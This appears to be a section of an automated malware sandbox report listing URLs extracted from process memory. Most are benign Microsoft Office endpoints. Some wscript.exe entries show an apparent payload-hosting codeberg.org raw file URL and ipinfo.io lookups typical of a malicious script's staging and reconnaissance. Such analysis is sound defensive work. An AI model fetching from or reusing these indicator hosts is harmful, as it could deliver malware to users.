Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.aadrm.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.aadrm.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.addins.omex.office.net/api/addins/search
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.cortana.ai
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.microsoftstream.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.office.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.onedrive.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://api.scheduler.
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://augloop.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://augloop.office.com/v2
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.com.br/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.com.br/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.com.cn/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.com.cn/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.com/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.com/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.es/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.es/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.fr/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.fr/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.in/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.in/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.it/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.it/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.online/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.online/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.sg/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.sg/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.uk/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.uk/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.xyz/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.0.drString found in binary or memory: https://autodiscover.xyz/autodiscover/autodiscover.xml
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://cdn.entity.
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://clients.config.office.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://clients.config.office.net/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: wscript.exe, 0000000A.00000002.2900321476.000002C65293A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2868890863.000002C65291F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/&k
Source: wscript.exe, 0000000A.00000002.2900321476.000002C65293A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2868890863.000002C65291F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/Rh
Source: wscript.exe, 0000000A.00000002.2904198896.000002C652A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2863119206.000002C652A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/mikecollin
Source: wscript.exe, 0000000A.00000003.2868121583.000002C64F766000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2866281412.000002C652740000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2893365916.000002C64F776000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2892221318.000002C64F778000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2859759315.000002C64D8FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2902931694.000002C6529F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2868121583.000002C64F781000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2894683056.000002C64D931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/mikecollines27288292/crispy-palm-tree/raw/branch
Source: wscript.exe, 0000000A.00000003.2866281412.000002C652740000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2890703864.000002C6527B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2897669951.000002C651CD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2894683056.000002C64D931000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2899373539.000002C6527B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2899373539.000002C6527C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/mikecollines27288292/crispy-palm-tree/raw/branch/main/crispy.txt
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://config.edge.skype.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://cortana.ai
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://cortana.ai/api
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://cr.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://d.docs.live.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://dev.cortana.ai
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://devnull.onenote.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://directory.services.
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ecs.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://graph.windows.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://graph.windows.net/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://invites.office.com/
Source: wscript.exe, 0000000B.00000002.2998006693.000001F1D0C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
Source: wscript.exe, 0000000B.00000002.2998006693.000001F1D0C20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2985942316.000001F1CDC99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3000400471.000001F1D0D45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2998006693.000001F1D0C7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3000400471.000001F1D0D6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2985942316.000001F1CDC72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2981188579.000001F1CBDF5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2985942316.000001F1CDCF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json
Source: wscript.exe, 0000000B.00000002.2995990183.000001F1D01A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json#
Source: wscript.exe, 0000000B.00000002.2998006693.000001F1D0C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonC
Source: wscript.exe, 0000000B.00000002.2998006693.000001F1D0C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonW
Source: wscript.exe, 0000000B.00000002.2998006693.000001F1D0C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonp
Source: wscript.exe, 0000000B.00000002.3000400471.000001F1D0D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonrtPublicKeyInfoExy
Source: wscript.exe, 0000000B.00000002.2998006693.000001F1D0C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonx
Source: wscript.exe, 0000000B.00000002.2999744938.000001F1D0D14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2981837384.000001F1CBF40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2996137717.000001F1D0320000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2981837384.000001F1CBED4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2979312096.000000973F76F000.00000004.00000010.00020000.00000000.sdmp, json[1].json.11.drString found in binary or memory: https://ipinfo.io/missingauth
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://lifecycle.office.com
Source: wscript.exe, 0000000A.00000003.2866281412.000002C652740000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2899373539.000002C6527C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://login.microsoftonline.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://login.windows.local
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://make.powerautomate.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://management.azure.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://management.azure.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://messaging.action.office.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://messaging.office.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ncus.contentsync.
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://officeapps.live.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://onedrive.live.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://otelrules.svc.static.microsoft
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://outlook.office.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://outlook.office.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://outlook.office365.com
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://outlook.office365.com/
Source: C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
